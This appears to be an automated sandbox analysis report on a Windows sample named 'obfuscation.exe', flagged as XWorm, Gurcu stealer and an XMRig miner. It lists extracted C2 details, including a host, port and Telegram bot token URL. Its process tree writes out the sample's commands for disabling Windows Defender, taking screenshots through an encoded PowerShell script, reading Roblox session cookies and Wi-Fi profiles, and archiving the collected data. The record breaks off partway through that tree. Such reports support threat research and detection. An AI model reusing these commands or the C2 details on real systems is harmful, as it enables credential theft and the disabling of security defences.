Analysis

  • max time kernel
    72s
  • max time network
    78s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-07-2024 11:46

General

  • Target

    obfuscation.exe

  • Size

    9.1MB

  • MD5

    2ae868b168beb1deb65d20f874bce159

  • SHA1

    9a46809b44bcef9991434e8e15e3c1f2457e99bb

  • SHA256

    7e6af40b57f5bbcd748800a280c4d246b4a57b364b02fa17a912408e717f047e

  • SHA512

    8c883e738c2ea0db42d66c55f6edd50bd9b894d8ebd856669e99284f380c14bf99d748f52ca9cc7583ee55f06432a27c2fa54c500a7c688e10ab9516d2181bef

  • SSDEEP

    196608:nMhkTeaA1HeT39IigQWc0/aHeM1F9m0gJ2u:MqTw1+TtIiLm/Y29

Malware Config

Extracted

Family

xworm

C2

logo-active.gl.at.ply.gg:25835

0x9d2c646775BAa45D051289fE9b2c1AacD26A43A0:1

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    msedge.exe

  • telegram

    https://api.telegram.org/bot6763574008:AAHEXR4ypdI308urgV3J-jyMocsw7X8318Q

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6763574008:AAHEXR4ypdI308urgV3J-jyMocsw7X8318Q/sendMessage?chat_id=tgratbot

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 35 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 54 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\obfuscation.exe
    "C:\Users\Admin\AppData\Local\Temp\obfuscation.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3720
    • C:\Users\Admin\AppData\Local\Temp\obfuscation.exe
      "C:\Users\Admin\AppData\Local\Temp\obfuscation.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2372
      • C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe
        C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3280
        • C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe
          C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:4796
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe'"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a2bkR1GR1\Built.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4068
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4316
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4852
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1380
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4424
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:772
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3360
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              6⤵
                PID:4892
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4632
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                6⤵
                  PID:4012
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2460
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  6⤵
                  • Detects videocard installed
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2640
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3480
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  6⤵
                  • Detects videocard installed
                  PID:3684
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4792
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:232
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:5064
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  6⤵
                  • Enumerates processes with tasklist
                  PID:100
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3232
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  6⤵
                  • Enumerates processes with tasklist
                  PID:1736
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                5⤵
                  PID:2736
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    6⤵
                      PID:3880
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    5⤵
                      PID:1424
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3696
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      5⤵
                        PID:4528
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          6⤵
                          • Enumerates processes with tasklist
                          PID:876
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        5⤵
                          PID:1480
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            6⤵
                              PID:4156
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                            5⤵
                              PID:772
                              • C:\Windows\system32\netsh.exe
                                netsh wlan show profile
                                6⤵
                                • Event Triggered Execution: Netsh Helper DLL
                                PID:5088
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "systeminfo"
                              5⤵
                                PID:1796
                                • C:\Windows\system32\systeminfo.exe
                                  systeminfo
                                  6⤵
                                  • Gathers system information
                                  PID:1576
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                5⤵
                                  PID:4916
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4648
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o544o0ai\o544o0ai.cmdline"
                                      7⤵
                                        PID:5060
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED00.tmp" "c:\Users\Admin\AppData\Local\Temp\o544o0ai\CSCEB4DE2C293E64AE793AE5C1826FACBCF.TMP"
                                          8⤵
                                            PID:1332
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      5⤵
                                        PID:3552
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          6⤵
                                            PID:3740
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          5⤵
                                            PID:3360
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              6⤵
                                                PID:4692
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              5⤵
                                                PID:2616
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  6⤵
                                                    PID:2344
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  5⤵
                                                    PID:2256
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      6⤵
                                                        PID:1608
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      5⤵
                                                        PID:1292
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          6⤵
                                                            PID:3192
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          5⤵
                                                            PID:1436
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              6⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2068
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            5⤵
                                                              PID:2428
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                6⤵
                                                                  PID:4156
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  6⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3880
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                5⤵
                                                                  PID:4256
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    6⤵
                                                                      PID:4048
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32802\rar.exe a -r -hp"0" "C:\Users\Admin\AppData\Local\Temp\WcO9E.zip" *"
                                                                    5⤵
                                                                      PID:888
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI32802\rar.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI32802\rar.exe a -r -hp"0" "C:\Users\Admin\AppData\Local\Temp\WcO9E.zip" *
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:704
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                      5⤵
                                                                        PID:1220
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic os get Caption
                                                                          6⤵
                                                                            PID:4536
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                          5⤵
                                                                            PID:1272
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
